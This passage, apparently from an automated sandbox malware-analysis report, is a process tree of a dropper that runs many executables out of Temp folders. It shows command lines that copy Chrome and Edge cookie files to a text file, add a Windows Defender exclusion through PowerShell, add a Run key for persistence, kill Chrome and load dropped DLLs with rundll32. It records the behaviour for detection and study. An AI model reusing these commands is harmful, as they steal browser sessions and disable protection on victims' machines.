                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zklvgdt5.1nd\md6_6ydj.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8064
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\zklvgdt5.1nd\md6_6ydj.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\zklvgdt5.1nd\md6_6ydj.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6656
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ssq35pp.qpr\ufgaa.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7300
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0ssq35pp.qpr\ufgaa.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\0ssq35pp.qpr\ufgaa.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7960
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:988
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2852
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8048
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2488
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 7960 -s 1628
                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6924
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7764
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\qpg0rani.w5b\anyname.exe" -q
                                                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7312
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gu4idmn5.2pa\CHLbrowser.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7208
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gu4idmn5.2pa\CHLbrowser.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\gu4idmn5.2pa\CHLbrowser.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7652
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7552
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7716
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7444
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2176
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS30D6.tmp\Install.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7304
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fvd2kjis.1cv\askinstall52.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7460
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fvd2kjis.1cv\askinstall52.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\fvd2kjis.1cv\askinstall52.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5896
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5308
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkhcdovp.pcr\5674d7511aa1fce0a68969dc57375b63.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3u4jwolt.pfr\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ppvvcqhq.2vq\112233.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0bvrqk4.5gv\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\u0bvrqk4.5gv\installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\u0bvrqk4.5gv\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe /8-2222 & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe /8-2222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\nomzv12d.12e\app.exe" /8-2222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding B703FCC75A274F0E7D502CD093488DDC C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding D2A9B0E82638E895D5F3A0BD33501AB3 C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 88306ACE95FCB106FADCEE8DD5A693F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--PIJmcZ4D"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffd698c9ec0,0x7ffd698c9ed0,0x7ffd698c9ee0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=1724 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2032 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2388 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2928 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2924 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=2604 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3192 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3236 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3212 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,10755271670404852355,13116881015643983405,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5880_1736630008" --mojo-platform-channel-handle=3224 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
